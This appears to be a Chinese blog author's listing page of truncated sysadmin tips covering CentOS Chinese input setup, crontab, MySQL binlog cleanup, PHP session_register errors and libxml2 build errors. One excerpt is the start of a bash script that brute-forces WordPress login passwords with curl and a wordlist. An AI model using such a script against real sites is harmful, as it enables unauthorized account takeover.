作者“sunshine”的文章:
2.yum install "@Chinese Support"
3.exit
4.回到桌面,system->preferences->input method
5.如果没有,先注销一下。
6.到里面add输入法到列表里。
7.最后再注销、登录。
========================================================
# yum install "@Hindi Support"
# yum install "@Chinese Support"
OR
# yum groupinstall “Chinese Support”
这是CentOS 5的,应当适用于CentOS 6
为当前用户创建cron服务
1. 键入 crontab -e 编辑crontab服务文件
例如 文件内容如下:
*/2 * * * * /bin/sh /home/admin/jiaoben/buy/deleteFile.sh
保存文件并并退出
*/2 * * * * /bin/sh /home/admin/jiaoben/buy/deleteFile.sh
*/2 * * * ...
删除mysql-bin.0000X 日志文件并禁止再生
红色表示输入的命令.
[root@jiucool var]# /usr/local/mysql/bin/mysql -u root -p
Enter password: (输入密码)
Welcome to the MySQL monitor. Commands end with ; or /g.
Your MySQL connection id is 264001
Server version: 5.1.35-log Source distribution
Type ‘help;’ or ‘/h’ for help. Type ‘/c’ to clear the current input statement.
mysql>&...
5.4.x Call to undefined function session_register()
php版本是5.4.x版本的(),经过一系列的搜寻,发现这个函数在PHP5.4版本中已经被弃用了,已经被删除了。也就是这个函数不再可用了。直接注释掉就可以了,不用进行注册就可以声明session。(亲测可以正常使用)
另外的解决方法就是在include/userlogin.class.php 中声明一个函数
function session_register()
{
return true;
}
(这个没有测试。)
WordPress后台密码暴力破解程序,请先确认机器已安装curl
#!/bin/bash #by leo108 #使用方式:./wp-pwd.sh 用户名 字典 登录页面 线程数 #例如: ./wp-pwd.sh leo 1.txt http://xxx.com/wp-login.php 15 user=$1 zidian=$2 url=$3 thread=$4 function guess { curl -s -d "log=$user&pwd=$1" $url >> $1.html l=$(wc -l $1.html| awk -F[:" "]+ '{print $1}') ...
Ubuntu安装PHP时候出错:error: xml2-config not found. Please check your libxml2 installation
Ubuntu>下接着安装php时候,在configure后,又出现错误提示:error: xml2-config not found. Please check your libxml2 installation.我又在网上搜了到了解决方法:
与编译MySQL时相同,这是由于系统缺少PHP所需的库文件导致的,根据提示,进行如下操作:
sudo apt-get install libxml2(按Tab键)
将会看到如下信息:
libxml2 libxml2-dev libxml2-he...